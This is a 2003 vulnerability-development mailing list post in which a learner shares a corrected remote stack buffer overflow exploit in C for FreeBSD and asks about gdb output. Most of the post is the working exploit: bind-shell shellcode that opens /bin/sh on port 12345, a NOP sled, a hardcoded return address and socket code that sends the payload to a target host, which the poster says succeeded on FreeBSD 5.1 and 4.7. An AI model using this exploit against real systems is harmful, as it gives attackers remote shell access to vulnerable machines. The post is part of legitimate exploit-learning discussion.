Vulnerability Development mailing list archives
Problem with sample buffer overflow exploit solved
From: Ganbold <ganbold () micom mng net>
Date: Thu, 02 Oct 2003 11:25:02 +0900
Hi, thanks to all the people who helped me. Finally I solved my problem :) Here is my corrected version of the exploit. It worked on FreeBSD 5.1 and FreeBSD 4.7.
-------------------------------------------------------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>      /* atoi */
#include <string.h>      /* memset, memcpy */
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <errno.h>
#include <unistd.h>

/*
 * FreeBSD shellcode - binds /bin/sh to a port 12345
 * Claes M. Nyberg 20020619
 * <cmn () darklab org>, <md0claes () mdstud chalmers se>
 */
char shellcode[]= /* port _______*/
"\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\x39"
"\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\xcd"
"\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\x83"
"\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\x53"
"\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\x50"
"\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0"
"\x40\x50\x50\xcd\x80";

#define RET 0xbfbffa48

int main(int argc, char *argv[]) {
    char buffer[1064];
    int s, i, size, offset;
    struct sockaddr_in remote;
    struct hostent *host;

    if (argc != 4) {
        printf("Usage: %s target-ip port offset\n", argv[0]);
        return -1;
    }

    /* return address = RET minus the offset given on the command line */
    offset = RET - atoi(argv[3]);

    /* filling buffer with NOPs */
    memset(buffer, 0x90, 1064);
    printf("scsize: %d\nret: 0x%x\n", (int)(sizeof(shellcode) - 1), offset);

    /* copying shellcode into buffer; at offset 140, 150, 200 it works finally :):):):) */
    memcpy(buffer + 851 - sizeof(shellcode), shellcode, sizeof(shellcode) - 1);

    /* copying the return address multiple times at the end of the buffer... */
    for (i = 1010; i < 1060; i += 4) {
        *((int *) &buffer[i]) = offset;
    }
    buffer[1063] = 0x0;

    /* resolving hostname */
    host = gethostbyname(argv[1]);
    if (host == NULL) {
        fprintf(stderr, "Unknown Host %s\n", argv[1]);
        return -1;
    }

    /* creating socket... */
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) {
        fprintf(stderr, "Error: Socket\n");
        return -1;
    }

    remote.sin_family = AF_INET;
    remote.sin_addr = *((struct in_addr *)host->h_addr);
    remote.sin_port = htons(atoi(argv[2]));

    /* connecting with destination host */
    if (connect(s, (struct sockaddr *)&remote, sizeof(remote)) == -1) {
        close(s);
        fprintf(stderr, "Error: connect\n");
        return -1;
    }

    /* sending exploit string */
    size = send(s, buffer, sizeof(buffer), 0);
    if (size == -1) {
        close(s);
        fprintf(stderr, "sending data failed\n");
        return -1;
    }

    /* closing socket */
    close(s);
    return 0;
}
-------------------------------------------------------------------------------------------------------------------------------
The problem was that before, I placed the shellcode in the wrong place and the shellcode executed only partly. I moved my shellcode to a different place and moved the return address also, and finally it worked. It spawns a shell on port 12345. So it is really important to know where to place the shellcode and the return address. Also, the return address must point to one of the NOPs before the shellcode.

One more question. When the exploit is sent, in another terminal where I run the vulnerable program from gdb I see:
-------------------------------------------------------------------------------------------------------------------------------
(gdb) run 30460
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/home/tsgan/bof_files/vulnerable 30460
client from 127.0.0.1
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGTRAP, Trace/breakpoint trap.
Cannot remove breakpoints because program is no longer writable.
It might be running in another process.
Further execution is probably impossible.
0x080480c0 in ?? ()
-------------------------------------------------------------------------------------------------------------------------------
When I issue the command x/200bx $esp-200 I see the following:
-------------------------------------------------------------------------------------------------------------------------------
(gdb) x/200bx $esp-200
0xbfbffd34: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffd3c: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffd44: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffd4c: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffd54: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffd5c: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffd64: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffd6c: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffd74: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffd7c: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffd84: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffd8c: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffd94: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffd9c: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffda4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffdac: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffdb4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffdbc: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffdc4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffdcc: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffdd4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffddc: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffde4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffdec: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffdf4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(gdb)
-------------------------------------------------------------------------------------------------------------------------------
What does it mean? Does it mean that the program exited cleanly? Or does it say it executed the shellcode correctly?
Can somebody explain it to me a little bit? Thanks in advance,
Ganbold
